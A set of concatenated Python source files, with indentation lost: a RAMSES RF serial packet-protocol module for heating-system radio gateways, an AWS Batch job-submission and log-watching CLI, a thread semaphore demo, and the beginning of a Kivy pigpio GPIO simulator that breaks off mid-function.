self._ser_port = ser_port
self._extra = {} if extra is None else extra
self.serial = None
self._is_closing = None
self._poller = None
self._write_queue = None
self._start()
def _start(self):
if DEV_MODE:
_LOGGER.debug("SerTransProc._start() STARTING loop")
self._write_queue = Queue(maxsize=200)
self.serial = serial_for_url(self._ser_port[0], **self._ser_port[1])
self.serial.timeout = 0
self._poller = Thread(target=self._polling_loop, daemon=True)
self._poller.start()
self._protocol.connection_made(self)
def _polling_loop(self):
# asyncio.set_event_loop(self._loop)
# asyncio.get_running_loop() # TODO: this fails
self._protocol.connection_made(self)
while self.serial.is_open:
# time.sleep(0.001)
if self.serial.in_waiting:
# NOTE: cant use readline(), as it blocks until a newline is received
self._protocol.data_received(self.serial.read(self.serial.in_waiting))
continue
if self.serial and getattr(self.serial, "out_waiting", False):
# NOTE: rfc2217 ports have no out_waiting attr!
continue
if not self._write_queue.empty():
self.serial.write(self._write_queue.get())
self._write_queue.task_done()
self._protocol.connection_lost(exc=None)
def write(self, cmd):
"""Write some data bytes to the transport.
This does not block; it buffers the data and arranges for it to be sent out
asynchronously.
"""
# _LOGGER.debug("SerTransProc.write(%s)", cmd)
self._write_queue.put_nowait(cmd)
class PacketProtocolBase(asyncio.Protocol):
"""Interface for a packet protocol (no Qos).
ex transport: self.data_received(bytes) -> self._callback(pkt)
to transport: self.send_data(cmd) -> self._transport.write(bytes)
"""
_dt_now = dt_now if sys.platform == "win32" else dt.now
def __init__(self, gwy, pkt_handler: Callable) -> None:
self._gwy = gwy
self._loop = gwy._loop
self._callback = pkt_handler # Could be None
self._transport = None
self._pause_writing = True
self._recv_buffer = bytes()
self._prev_pkt = None
self._this_pkt = None
self._disable_sending = gwy.config.disable_sending
self._evofw_flag = gwy.config.evofw_flag
if gwy.config.enforce_known_list:
self._exclude = []
self._include = list(gwy._include.keys())
else:
self._exclude = list(gwy._exclude.keys())
self._include = []
self._unwanted = [] # not: [NON_DEVICE_ID, NUL_DEVICE_ID]
self._hgi80 = {
IS_INITIALIZED: None,
IS_EVOFW3: None,
DEVICE_ID: None,
}
def connection_made(self, transport: asyncio.Transport) -> None:
"""Called when a connection is made."""
# _LOGGER.debug("PktProtocol.connection_made(%s)", transport)
self._transport = transport
if self._include: # TODO: here, or in init?
_LOGGER.info(
f"Enforcing the {KNOWN_LIST} (as a whitelist): %s", self._include
)
elif self._exclude:
_LOGGER.info(
f"Enforcing the {BLOCK_LIST} (as a blacklist): %s", self._exclude
)
else:
_LOGGER.warning(
f"Not using any device filter: using a {KNOWN_LIST} (as a whitelist) "
"is strongly recommended)"
)
# @functools.lru_cache(maxsize=128)
def _is_wanted(self, src_id, dst_id) -> Optional[bool]:
"""Parse the packet, return True if the packet is not to be filtered out.
An unwanted device_id will 'trump' a whitelited device_id in the same packet
because there is a significant chance the packet is simply corrupt.
"""
for dev_id in [d for d in dict.fromkeys((src_id, dst_id))]:
if dev_id in self._unwanted:
return
if dev_id in self._exclude:
_LOGGER.info(
f"Blocking packets with device_id: {dev_id} (is blacklisted), "
f"if required, remove it from the {BLOCK_LIST})"
)
self._unwanted.append(dev_id)
return
if dev_id in (NON_DEVICE_ID, NUL_DEVICE_ID):
continue
if not self._include or dev_id in self._include:
continue # check the other device_id, if any
if dev_id == self._hgi80[DEVICE_ID]:
_LOGGER.warning(
f"Allowing packets with device_id: {dev_id} (is active gateway?), "
f"configure the {KNOWN_LIST}/{BLOCK_LIST} as required"
)
self._include.append(dev_id) # the only time include list is modified
continue
_LOGGER.warning(
f"Blocking packets with device_id: {dev_id} (is not whitelisted), "
f"if required, add it to the {KNOWN_LIST}"
)
self._unwanted.append(dev_id)
return
return True
def _pkt_received(self, pkt: Packet) -> None:
"""Pass any valid/wanted packets to the callback."""
self._this_pkt, self._prev_pkt = pkt, self._this_pkt
if self._callback and self._is_wanted(pkt.src.id, pkt.dst.id):
try:
self._callback(pkt) # only wanted PKTs to the MSG transport's handler
except InvalidPacketError as exc:
_LOGGER.error("%s < %s", pkt, exc)
except: # noqa: E722 # TODO: remove broad-except
_LOGGER.exception("Exception in callback to message layer")
def _line_received(self, dtm: dt, line: str, raw_line: ByteString) -> None:
if _LOGGER.getEffectiveLevel() == logging.INFO: # i.e. don't log for DEBUG
_LOGGER.info("RF Rx: %s", raw_line)
self._hgi80[IS_INITIALIZED], was_initialized = True, self._hgi80[IS_INITIALIZED]
try:
pkt = Packet.from_port(self._gwy, dtm, line, raw_line=raw_line)
except InvalidPacketError as exc:
if "# evofw" in line and self._hgi80[IS_EVOFW3] is None:
self._hgi80[IS_EVOFW3] = line
if self._evofw_flag not in (None, "!V"):
self._transport.write(
bytes(f"{self._evofw_flag}\r\n".encode("ascii"))
)
elif was_initialized and line and line[:1] != "#" and "*" not in line:
_LOGGER.error("%s < Cant create packet (ignoring): %s", line, exc)
return
if pkt.src.type == "18": # DEX
if self._hgi80[DEVICE_ID] is None:
self._hgi80[DEVICE_ID] = pkt.src.id
elif self._hgi80[DEVICE_ID] != pkt.src.id:
(_LOGGER.debug if pkt.src.id in self._unwanted else _LOGGER.warning)(
f"{pkt} < There appears to be more than one HGI80-compatible device"
f" (active gateway: {self._hgi80[DEVICE_ID]}), this is unsupported"
)
self._pkt_received(pkt)
def data_received(self, data: ByteString) -> None:
"""Called when some data (packet fragments) is received (from RF)."""
# _LOGGER.debug("PacketProtocolBase.data_received(%s)", data.rstrip())
def _bytes_received(
data: ByteString,
) -> Generator[ByteString, ByteString, None]:
self._recv_buffer += data
if b"\r\n" in self._recv_buffer:
lines = self._recv_buffer.split(b"\r\n")
self._recv_buffer = lines[-1]
for line in lines[:-1]:
yield self._dt_now(), line
for dtm, raw_line in _bytes_received(data):
self._line_received(dtm, _normalise(_str(raw_line)), raw_line)
async def _send_data(self, data: str) -> None:
"""Send a bytearray to the transport (serial) interface."""
while self._pause_writing:
await asyncio.sleep(0.005)
# while (
# self._transport is None
# # or self._transport.serial is None # Shouldn't be required, but is!
# or getattr(self._transport.serial, "out_waiting", False)
# ):
# await asyncio.sleep(0.005)
data = bytes(data.encode("ascii"))
if _LOGGER.getEffectiveLevel() == logging.INFO: # i.e. don't log for DEBUG
_LOGGER.info("RF Tx: %s", data)
self._transport.write(data + b"\r\n")
# 0.2: can still exceed RF duty cycle limit with back-to-back restarts
# await asyncio.sleep(0.2) # TODO: RF Duty cycle, make configurable?
async def send_data(self, cmd: Command) -> None:
"""Called when some data is to be sent (not a callback)."""
_LOGGER.debug("PktProtocol.send_data(%s)", cmd)
if self._disable_sending:
raise RuntimeError("Sending is disabled")
# if not self._is_wanted(cmd.src, cmd.dst):
# _LOGGER.warning(
# return
if cmd.src.id != HGI_DEVICE_ID:
if self._hgi80[IS_EVOFW3]:
_LOGGER.info(
"Impersonating device: %s, for pkt: %s", cmd.src.id, cmd.tx_header
)
else:
_LOGGER.warning(
"Impersonating device: %s, for pkt: %s"
", NB: standard HGI80s dont support this feature, it needs evofw3!",
cmd.src.id,
cmd.tx_header,
)
await self.send_data(Command._puzzle("02", cmd.tx_header))
await self._send_data(str(cmd))
def connection_lost(self, exc: Optional[Exception]) -> None:
"""Called when the connection is lost or closed."""
_LOGGER.debug("PktProtocol.connection_lost(%s)", exc)
# serial.serialutil.SerialException: device reports error (poll)
if exc is not None:
raise exc
def pause_writing(self) -> None:
"""Called when the transport's buffer goes over the high-water mark."""
_LOGGER.debug("PktProtocol.pause_writing()")
self._pause_writing = True
def resume_writing(self) -> None:
"""Called when the transport's buffer drains below the low-water mark."""
_LOGGER.debug("PktProtocol.resume_writing()")
self._pause_writing = False
class PacketProtocolPort(PacketProtocolBase):
"""Interface for a packet protocol (without QoS)."""
def connection_made(self, transport: asyncio.Transport) -> None:
"""Called when a connection is made."""
_LOGGER.info(f"RAMSES_RF protocol library v{VERSION} (serial port)")
super().connection_made(transport) # self._transport = transport
# self._transport.serial.rts = False
# determine if using a evofw3 rather than a HGI80
self._transport.write(bytes("!V\r\n".encode("ascii")))
# add this to start of the pkt log, if any
if not self._disable_sending:
self._loop.create_task(self.send_data(INIT_CMD))
self.resume_writing()
class PacketProtocol(PacketProtocolPort):
"""Interface for a packet protocol (without QoS)."""
def __init__(self, gwy, pkt_handler: Callable) -> None:
_LOGGER.debug(
"PktProtocol.__init__(gwy, %s) *** Std version ***",
pkt_handler.__name__ if pkt_handler else None,
)
super().__init__(gwy, pkt_handler)
class PacketProtocolRead(PacketProtocolBase):
"""Interface for a packet protocol (for packet log)."""
def __init__(self, gwy, pkt_handler: Callable) -> None:
_LOGGER.debug(
"PacketProtocolRead.__init__(gwy, %s) *** R/O version ***",
pkt_handler.__name__ if pkt_handler else None,
)
super().__init__(gwy, pkt_handler)
def connection_made(self, transport: asyncio.Transport) -> None:
"""Called when a connection is made."""
_LOGGER.info(f"RAMSES_RF protocol library v{VERSION} (packet log)")
super().connection_made(transport) # self._transport = transport
def _line_received(self, dtm: str, line: str, raw_line: str) -> None:
try:
pkt = Packet.from_file(self._gwy, dtm, line)
except (InvalidPacketError, ValueError): # VE from dt.fromisoformat()
return
self._pkt_received(pkt)
def data_received(self, data: str) -> None:
"""Called when a packet line is received (from a log file)."""
# _LOGGER.debug("PacketProtocolRead.data_received(%s)", data.rstrip())
self._line_received(data[:26], _normalise(data[27:], log_file=True), data)
def _dt_now(self) -> dt:
try:
return self._this_pkt.dtm
except AttributeError:
return dt(1970, 1, 1, 1, 0)
class PacketProtocolQos(PacketProtocolPort):
"""Interface for a packet protocol (includes QoS)."""
def __init__(self, gwy, pkt_handler: Callable) -> None:
_LOGGER.debug(
"PktProtocol.__init__(gwy, %s) *** Qos version ***",
pkt_handler.__name__ if pkt_handler else None,
)
super().__init__(gwy, pkt_handler)
self._qos_lock = Lock()
self._qos_cmd = None
self._tx_hdr = None
self._rx_hdr = None
self._tx_retries = None
self._tx_retry_limit = None
self._backoff = 0
self._timeout_full = None
self._timeout_half = None
def _timeouts(self, dtm: dt) -> Tuple[dt, dt]:
"""Update self._timeout_full, self._timeout_half"""
if self._qos_cmd:
if self._tx_hdr:
timeout = QOS_TX_TIMEOUT
else:
timeout = self._qos_cmd.qos.get("timeout", QOS_RX_TIMEOUT)
self._timeout_full = dtm + timeout * 2 ** self._backoff
self._timeout_half = dtm + timeout * 2 ** (self._backoff - 1)
# _LOGGER.debug(
# "backoff=%s, timeout=%s, timeout_full=%s",
# self._backoff,
# timeout,
# self._timeout_full.isoformat(timespec="milliseconds"),
# )
# if self._timeout_half >= dtm:
# self._backoff = max(self._backoff - 1, 0)
# if self._timeout_full >= dtm:
# self._backoff = min(self._backoff + 1, QOS_MAX_BACKOFF)
def _pkt_received(self, pkt: Packet) -> None:
"""Perform any QoS functions before processing valid/wanted packets."""
def _logger_rcvd(logger, message: str) -> None:
if self._qos_cmd is None:
wanted = None
elif self._tx_hdr:
wanted = self._tx_hdr
else:
wanted = self._rx_hdr
logger(
"PktProtocolQos.data_rcvd(rcvd=%s): boff=%s, want=%s, tout=%s: %s",
pkt._hdr or str(pkt),
self._backoff,
wanted,
self._timeout_full.isoformat(timespec="milliseconds"),
message,
)
if self._qos_cmd:
_logger_rcvd(_LOGGER.debug, "CHECKING")
# NOTE: is the Tx pkt, and no response is expected
if pkt._hdr == self._tx_hdr and self._rx_hdr is None:
log_msg = "matched the Tx pkt (not wanting a Rx pkt) - now done"
self._qos_lock.acquire()
self._qos_cmd = None
self._qos_lock.release()
# NOTE: is the Tx pkt, and a response *is* expected
elif pkt._hdr == self._tx_hdr:
# assert str(pkt)[4:] == str(self._qos_cmd), "Packets dont match"
log_msg = "matched the Tx pkt (now wanting a Rx pkt)"
self._tx_hdr = None
# NOTE: is the Tx pkt, but is a *duplicate* - we've already seen it!
elif pkt._hdr == self._qos_cmd.tx_header:
# assert str(pkt) == str(self._qos_cmd), "Packets dont match"
log_msg = "duplicated Tx pkt (still wanting the Rx pkt)"
self._timeouts(dt.now()) # TODO: increase backoff?
# NOTE: is the Rx pkt, and is a non-Null (expected) response
elif pkt._hdr == self._rx_hdr:
log_msg = "matched the Rx pkt - now done"
self._qos_lock.acquire()
self._qos_cmd = None
self._qos_lock.release()
# TODO: is the Rx pkt, but is a Null response
# elif pkt._hdr == self._qos_cmd.null_header:
# log_msg = "matched a NULL Rx pkt - now done"
# self._qos_lock.acquire()
# self._qos_cmd = None
# self._qos_lock.release()
# NOTE: is not the expected pkt, but another pkt
else:
log_msg = (
"unmatched pkt (still wanting a "
+ ("Tx" if self._tx_hdr else "Rx")
+ " pkt)"
)
self._timeouts(dt.now())
_logger_rcvd(_LOGGER.debug, f"CHECKED - {log_msg}")
else: # TODO: no outstanding cmd - ?throttle down the backoff
# self._timeouts(dt.now())
_logger_rcvd(_LOGGER.debug, "XXXXXXX - ")
super()._pkt_received(pkt)
async def send_data(self, cmd: Command) -> None:
"""Called when some data is to be sent (not a callback)."""
_LOGGER.debug("PktProtocolQos.send_data(%s)", cmd)
def _logger_send(logger, message: str) -> None:
logger(
"PktProtocolQos.send_data(%s): boff=%s, want=%s, tout=%s: %s",
cmd.tx_header,
self._backoff,
self._tx_hdr or self._rx_hdr,
self._timeout_full.isoformat(timespec="milliseconds"),
message,
)
def _expired_cmd(cmd):
hdr, callback = cmd.tx_header, cmd.callback
if callback and not callback.get("expired"):
# see also: MsgTransport._pkt_receiver()
_LOGGER.error("PktProtocolQos.send_data(%s): Expired callback", hdr)
callback[FUNC](False, *callback.get(ARGS, tuple()))
callback["expired"] = not callback.get(DEAMON, False) # HACK:
while self._qos_cmd is not None:
await asyncio.sleep(0.005)
await super().send_data(cmd)
self._qos_lock.acquire()
self._qos_cmd = cmd
self._qos_lock.release()
self._tx_hdr = cmd.tx_header
self._rx_hdr = cmd.rx_header # Could be None
self._tx_retries = 0
self._tx_retry_limit = cmd.qos.get("retries", QOS_TX_RETRIES)
self._timeouts(dt.now())
while self._qos_cmd is not None: # until sent (may need re-transmit) or expired
await asyncio.sleep(0.005)
if self._timeout_full > dt.now():
await asyncio.sleep(0.02)
# await self._send_data("")
elif self._qos_cmd is None: # can be set to None by data_received
continue
elif self._tx_retries < self._tx_retry_limit:
self._tx_hdr = cmd.tx_header
self._tx_retries += 1
if not self._qos_cmd.qos.get("disable_backoff", False):
self._backoff = min(self._backoff + 1, QOS_MAX_BACKOFF)
self._timeouts(dt.now())
await self._send_data(str(cmd))
_logger_send(
(_LOGGER.warning if DEV_MODE else _LOGGER.debug),
f"RE-SENT ({self._tx_retries}/{self._tx_retry_limit})",
) # TODO: should be debug
else:
if self._qos_cmd.code != _PUZZ: # HACK: why expired when shouldn't
_logger_send(
_LOGGER.warning,
f"EXPIRED ({self._tx_retries}/{self._tx_retry_limit})",
)
_expired_cmd(self._qos_cmd)
self._qos_lock.acquire()
self._qos_cmd = None
self._qos_lock.release()
self._backoff = 0 # TODO: need a better system
break
else:
if self._timeout_half >= self._dt_now():
self._backoff = max(self._backoff - 1, 0)
_logger_send(_LOGGER.debug, "SENT OK")
def create_pkt_stack(
gwy,
pkt_callback,
protocol_factory=None,
ser_port=None,
packet_log=None,
packet_dict=None,
) -> Tuple[asyncio.Protocol, asyncio.Transport]:
"""Utility function to provide a transport to the internal protocol.
The architecture is: app (client) -> msg -> pkt -> ser (HW interface).
The msg/pkt interface is via:
- PktProtocol.data_received to (pkt_callback) MsgTransport._pkt_receiver
- MsgTransport.write (pkt_dispatcher) to (pkt_protocol) PktProtocol.send_data
"""
def _protocol_factory():
if packet_log or packet_dict is not None:
return create_protocol_factory(PacketProtocolRead, gwy, pkt_callback)()
elif gwy.config.disable_sending: # TODO: assumes we wont change our mind
return create_protocol_factory(PacketProtocol, gwy, pkt_callback)()
else:
return create_protocol_factory(PacketProtocolQos, gwy, pkt_callback)()
if len([x for x in (packet_dict, packet_log, ser_port) if x is not None]) != 1:
raise TypeError("port / file / dict should be mutually exclusive")
pkt_protocol = (protocol_factory or _protocol_factory)()
if packet_log or packet_dict is not None: # {} is a processable packet_dict
pkt_transport = SerTransportRead(
gwy._loop, pkt_protocol, packet_log or packet_dict
)
return (pkt_protocol, pkt_transport)
ser_config = DEFAULT_SERIAL_CONFIG
ser_config.update(gwy.config.serial_config)
# python client.py monitor 'alt:///dev/ttyUSB0?class=PosixPollSerial'
try:
ser_instance = serial_for_url(ser_port, **ser_config)
except SerialException as exc:
_LOGGER.error("Failed to open %s (config: %s): %s", ser_port, ser_config, exc)
raise
try: # FTDI on Posix/Linux would be a common environment for this library...
ser_instance.set_low_latency_mode(True)
except (AttributeError, NotImplementedError, ValueError): # Wrong OS/Platform/FTDI
pass
if any(
(
ser_port.startswith("rfc2217:"),
ser_port.startswith("socket:"),
os.name == "nt",
)
):
pkt_transport = SerTransportPoll(gwy._loop, pkt_protocol, ser_instance)
else:
pkt_transport = SerTransportAsync(gwy._loop, pkt_protocol, ser_instance)
return (pkt_protocol, pkt_transport)
|
tools.py
|
"""
Command-line tools for interacting with AWS Batch
-------------------------------------------------
"""
import logging
import threading
import time
from typing import Any
from typing import Dict
from typing import List
from typing import Optional
import boto3
import mypy_boto3_batch as batch
import mypy_boto3_logs as logs
from mypy_boto3_batch.type_defs import DescribeJobsResponseTypeDef # noqa
from mypy_boto3_batch.type_defs import KeyValuePairTypeDef # noqa
from mypy_boto3_batch.type_defs import SubmitJobResponseTypeDef # noqa
from pyfgaws.batch import BatchJob
from pyfgaws.batch import Status
from pyfgaws.logs import DEFAULT_POLLING_INTERVAL as DEFAULT_LOGS_POLLING_INTERVAL
from pyfgaws.logs import Log
def _log_it(
region_name: str, job: BatchJob, logger: logging.Logger, delay: Optional[int] = None
) -> None:
"""Creates a background thread to print out CloudWatch logs.
Args:
region_name: the AWS region
job: the AWS batch job
logger: the logger to which logs should be printed
delay: the number of seconds to wait after polling for status. Only used when
`--watch-until` is `true`.
"""
if job.stream is None:
return None
# Create a background thread
logs_thread = threading.Thread(
target=_watch_logs, args=(region_name, job, logger, delay), daemon=True
)
logs_thread.start()
def watch_job(
*,
job_id: str,
region_name: Optional[str] = None,
print_logs: bool = True,
delay: Optional[int] = None,
) -> None:
"""Watches an AWS batch job.
This tool a small random jitter (+/-2 seconds) to the delay to help avoid AWS batch API
limits for monitoring batch jobs in the cases of many requests across concurrent jobs. A
minimum delay of 1 second is subsequently applied.
Args:
job_id: the AWS batch job identifier
region_name: the AWS region
print_logs: true to print CloudWatch logs, false otherwise
delay: the number of seconds to wait after polling for status. Only used when
`--watch-until` is `true`.
"""
logger = logging.getLogger(__name__)
client: batch.Client = boto3.client(
service_name="batch", region_name=region_name # type: ignore
)
# Create the job
job: BatchJob = BatchJob.from_id(client=client, job_id=job_id)
logger.info(f"Watching job with name '{job.name}' and id '{job.job_id}'")
if print_logs:
_log_it(region_name=region_name, job=job, logger=logger, delay=delay)
if delay is None:
time.sleep(DEFAULT_LOGS_POLLING_INTERVAL)
else:
time.sleep(delay)
job.wait_on_complete(delay=delay)
end_status = job.get_status()
logger.info(
f"Job completed with name '{job.name}', id '{job.job_id}', and status '{end_status}'"
)
def run_job(
*,
job_definition: str,
name: Optional[str] = None,
region_name: Optional[str] = None,
print_logs: bool = True,
queue: Optional[str] = None,
cpus: Optional[int] = None,
mem_mb: Optional[int] = None,
command: List[str] = [],
parameters: Optional[Dict[str, Any]] = None,
environment: Optional[KeyValuePairTypeDef] = None,
watch_until: List[Status] = [],
after_success: bool = False,
delay: Optional[int] = None,
) -> None:
"""Submits a batch job and optionally waits for it to reach one of the given states.
This tool a small random jitter (+/-2 seconds) to the delay to help avoid AWS batch API
limits for monitoring batch jobs in the cases of many requests across concurrent jobs. A
minimum delay of 1 second is subsequently applied.
Args:
job_definition: the ARN for the AWS batch job definition, or the name of the job definition
to get the latest revision
name: the name of the job, otherwise one will be automatically generated
region_name: the AWS region
print_logs: true to print CloudWatch logs, false otherwise
queue: the name of the AWS batch queue
cpus: the number of CPUs to request
mem_mb: the amount of memory to request (in megabytes)
command: the command(s) to use
parameters: the (JSON) dictionary of parameters to use
environment: the (JSON) dictionary of environment variables to use
watch_until: watch until any of the given statuses are reached. If the job reaches a
status past all statuses, then an exception is thrown. For example, `Running` will
fail if `Succeeded` is reached, while `Succeeded` will fail if `Failed` is reached. To
wait for the job to complete regardless of status, use both `Succeeded` and `Failed`.
See the `--after-success` option to control this behavior.
after_success: true to treat states after the `watch_until` states as success, otherwise
failure.
delay: the number of seconds to wait after polling for status. Only used when
`--watch-until` is `true`.
"""
logger = logging.getLogger(__name__)
batch_client: batch.Client = boto3.client(
service_name="batch", region_name=region_name # type: ignore
)
job = BatchJob(
client=batch_client,
queue=queue,
job_definition=job_definition,
name=name,
cpus=cpus,
mem_mb=mem_mb,
command=command,
environment=None if environment is None else [environment],
parameters=parameters,
logger=logger,
)
# Submit the job
logger.info("Submitting job...")
job.submit()
logger.info(f"Job submitted with name '{job.name}' and id '{job.job_id}'")
# Optionally wait on it to complete
# Note: watch_until should be type Optional[List[Status]], but see:
# - https://github.com/anntzer/defopt/issues/83
if len(watch_until) > 0:
if print_logs:
_log_it(region_name=region_name, job=job, logger=logger, delay=delay)
# Wait for the job to reach on of the statuses
job.wait_on(
status_to_state=dict((status, True) for status in watch_until),
after_success=after_success,
delay=delay,
)
end_status: Status = job.get_status()
if print_logs and end_status.logs:
_watch_logs(region_name=region_name, job=job, logger=logger, indefinitely=False)
logger.info(
f"Job name '{job.name}' and id '{job.job_id}' reached status '" f"{end_status.status}'"
)
def _watch_logs(
region_name: str,
job: BatchJob,
logger: logging.Logger,
delay: Optional[int] = None,
polling_interval: int = DEFAULT_LOGS_POLLING_INTERVAL,
indefinitely: bool = True,
) -> None:
"""A method to watch logs.
Args:
region_name: the AWS region
job: the AWS batch job
logger: the logger to which logs should be printed
delay: the number of seconds to wait after polling for status. Only used when
`--watch-until` is `true`.
polling_interval: the default time to wait for new CloudWatch logs after no more logs are
returned
indefinitely: true to watch indefinitely, false to print only the available logs
"""
# wait until it's running to get the CloudWatch logs
job.wait_on_running(delay=delay)
client: Optional[logs.Client] = boto3.client(
service_name="logs", region_name=region_name # type: ignore
)
log: Log = Log(client=client, group=job.group, stream=job.stream)
try:
while True:
try:
for line in log:
logger.info(line)
except client.exceptions.ResourceNotFoundException:
logger.warning("The log stream has not been created, will try again.")
time.sleep(polling_interval)
log.reset()
if not indefinitely:
break
except Exception as ex:
logger.error(f"Encountered an exception while watching logs: {ex}")
raise ex
|
threads_semaphore.py
|
"""
Semaphore. Limiting the amount of threads executing at once.
Various examples exhibiting Thread use.
"""
from threading import Semaphore
from threading import Thread
from threading import current_thread
import logging
import os
import time
# Environment
ENV = os.environ.get("ENV") or "development"
LOG_LEVEL = os.environ.get("LOG_LEVEL") or "info"
# Configuration
DELAY = os.environ.get("DELAY") or "2"
# Logging
loggers = {"debug": logging.DEBUG, "info": logging.INFO, "error": logging.ERROR}
logging.basicConfig(level=loggers[LOG_LEVEL], format="%(asctime)-15s %(levelname)-8s %(message)s")
logger = logging.getLogger("synchronization")
logger.debug("Configuration...")
logger.debug("Environment => {}".format(ENV))
logger.debug("LOG LEVEL => {}".format(LOG_LEVEL))
logger.debug("DELAY => {} seconds".format(DELAY))
current_thread().setName("parent")
lock = Semaphore(5)
def sync(message: str):
"""Emulate Synchronization."""
logger.info("{} / id: {} /".format(current_thread().getName(), current_thread().ident))
for _ in range(5):
# Acquire the Lock
lock.acquire()
logger.info("{} => Checking In [ id: {} ]".format(current_thread().getName(), current_thread().ident))
# Synchronous Flow
logger.info("i {}".format(current_thread().getName()))
logger.info("am {}".format(current_thread().getName()))
logger.info("synchronous {}".format(current_thread().getName()))
logger.info("Message: {}".format(message))
time.sleep(1)
# Release the Lock
lock.release()
# Create Threads
t1 = Thread(target=sync, name="Lorem", args=("Lorem",))
t2 = Thread(target=sync, name="Ipsum", args=("Ipsum",))
t3 = Thread(target=sync, name="Dolor", args=("Dolor",))
t4 = Thread(target=sync, name="Sit", args=("Sit",))
t5 = Thread(target=sync, name="Ammet", args=("Ammet",))
# Invoke Threads
# First Come, First Serve
t1.start()
t2.start()
t3.start()
t4.start()
t5.start()
|
pigpiosim.py
|
#!/usr/bin/python3
import sys, os, socket, struct, pigpio, time, configparser
from threading import Thread, Event, Lock
from kivy.app import App
from kivy.lang.builder import Builder
from kivy.uix.gridlayout import GridLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.clock import mainthread
SCREEN = '''
<BorderLabel@Label>:
border_width: 1
border_color: (0.5, 0.5, 0.5, 1)
background_color: (0, 0, 0, 1)
canvas.before:
Color:
rgba: self.background_color
Rectangle:
pos: self.pos
size: self.size
Color:
rgba: self.border_color
Line:
width: self.border_width
rectangle: self.x, self.y, self.width, self.height
<Pin@BoxLayout>:
orientation: 'horizontal'
height: 22
size_hint_y: None
pin: ''
name: ''
<GPIOPin@Pin>:
mode: 'input'
io: ''
name: 'GPIO ' + self.io
<PinNumber@BorderLabel>:
width: 30
size_hint_x: None
<FixedPinL@Pin>:
pin_color: (0, 0, 0, 1)
label_color: (0, 0, 0, 1)
BorderLabel:
text: self.parent.name
background_color: self.parent.label_color
PinNumber:
text: self.parent.pin
background_color: self.parent.pin_color
<FixedPinR@Pin>:
pin_color: (0, 0, 0, 1)
label_color: (0, 0, 0, 1)
PinNumber:
text: self.parent.pin
background_color: self.parent.pin_color
BorderLabel:
text: self.parent.name
background_color: self.parent.label_color
<InputButton@Button>:
text: 'M'
font_size: '12sp'
width: 40 if self.parent.mode == 'input' else 0
size_hint_x: None if self.parent.mode == 'input' else 0
disabled: self.parent.mode != 'input'
opacity: 1 if self.parent.mode == 'input' else 0
on_press: self.parent.parent.toggleInput(self.parent)
on_release: self.parent.parent.toggleInput(self.parent)
<InputToggleButton@ToggleButton>:
text: 'T'
font_size: '12sp'
width: 40 if self.parent.mode == 'input' else 0
size_hint_x: None if self.parent.mode == 'input' else 0
disabled: self.parent.mode != 'input'
opacity: 1 if self.parent.mode == 'input' else 0
on_state: self.parent.parent.toggleInput(self.parent)
<OutputValue@BorderLabel>:
text: ''
<GPIOPinL@GPIOPin>:
pin_color: (0, 0.6, 0, 1)
label_color: (0, 0, 0, 1)
display_value: ''
BorderLabel:
id: label
text: self.parent.name
background_color: self.parent.label_color
InputButton:
InputToggleButton:
OutputValue:
text: self.parent.display_value
PinNumber:
text: self.parent.pin
background_color: self.parent.pin_color
<GPIOPinR@GPIOPin>:
pin_color: (0, 0.6, 0, 1)
label_color: (0, 0, 0, 1)
display_value: ''
PinNumber:
text: self.parent.pin
background_color: self.parent.pin_color
OutputValue:
text: self.parent.display_value
InputToggleButton:
InputButton:
BorderLabel:
id: label
text: self.parent.name
background_color: self.parent.label_color
<pigpioController>:
cols: 2
padding: 5
spacing: 5
FixedPinL:
pin: '1'
name: '3.3V'
pin_color: (0.8, 0, 0, 1)
FixedPinR:
pin: '2'
name: '5V'
pin_color: (0.8, 0, 0, 1)
GPIOPinL:
pin: '3'
io: '2'
FixedPinR:
pin: '4'
name: '5V'
pin_color: (0.8, 0, 0, 1)
GPIOPinL:
pin: '5'
io: '3'
FixedPinR:
pin: '6'
name: 'GND'
pin_color: (0, 0, 0, 1)
GPIOPinL:
pin: '7'
io: '4'
GPIOPinR:
pin: '8'
io: '14'
FixedPinL:
pin: '9'
name: 'GND'
pin_color: (0, 0, 0, 1)
GPIOPinR:
pin: '10'
io: '15'
GPIOPinL:
pin: '11'
io: '17'
GPIOPinR:
pin: '12'
io: '18'
GPIOPinL:
pin: '13'
io: '27'
FixedPinR:
pin: '14'
name: 'GND'
pin_color: (0, 0, 0, 1)
GPIOPinL:
pin: '15'
io: '22'
GPIOPinR:
pin: '16'
io: '23'
FixedPinL:
pin: '17'
name: '3.3V'
pin_color: (0.8, 0, 0, 1)
GPIOPinR:
pin: '18'
io: '24'
GPIOPinL:
pin: '19'
io: '10'
FixedPinR:
pin: '20'
name: 'GND'
pin_color: (0, 0, 0, 1)
GPIOPinL:
pin: '21'
io: '9'
GPIOPinR:
pin: '22'
io: '25'
GPIOPinL:
pin: '23'
io: '11'
GPIOPinR:
pin: '24'
io: '8'
FixedPinL:
pin: '25'
name: 'GND'
pin_color: (0, 0, 0, 1)
GPIOPinR:
pin: '26'
io: '7'
GPIOPinL:
pin: '27'
io: '0'
GPIOPinR:
pin: '28'
io: '1'
GPIOPinL:
pin: '29'
io: '5'
FixedPinR:
pin: '30'
name: 'GND'
pin_color: (0, 0, 0, 1)
GPIOPinL:
pin: '31'
io: '6'
GPIOPinR:
pin: '32'
io: '12'
GPIOPinL:
pin: '33'
io: '13'
FixedPinR:
pin: '34'
name: 'GND'
pin_color: (0, 0, 0, 1)
GPIOPinL:
pin: '35'
io: '19'
GPIOPinR:
pin: '36'
io: '16'
GPIOPinL:
pin: '37'
io: '26'
GPIOPinR:
pin: '38'
io: '20'
FixedPinL:
pin: '39'
name: 'GND'
pin_color: (0, 0, 0, 1)
GPIOPinR:
pin: '40'
io: '21'
'''
class ClientException(Exception):
pass
class pigpioClient:
nextHandle = 0
def __init__(self, app, sock, addr):
self.app = app
self.sock = sock
self.addr = addr
self.handle = pigpioClient.nextHandle
pigpioClient.nextHandle = pigpioClient.nextHandle + 1
self.eventSequence = 0
self.lock = Lock()
self.sock.settimeout(None)
self.thread = Thread(target = self.loop, name = 'Client {}'.format(addr), daemon = True)
self.thread.start()
def loop(self):
while self.sock:
try:
buffer = self.sock.recv(16)
if not len(buffer): break
if len(buffer) != 16:
raise ClientException('incomplete command')
buffer = bytes(buffer)
cmdStruct = struct.unpack('4I', buffer)
extension = None
if cmdStruct[3]:
buffer = self.sock.recv(cmdStruct[3])
if len(buffer) != cmdStruct[3]:
raise ClientException('incomplete command extension')
extension = bytes(buffer)
self.processCommand(*cmdStruct, extension)
except ClientException as e:
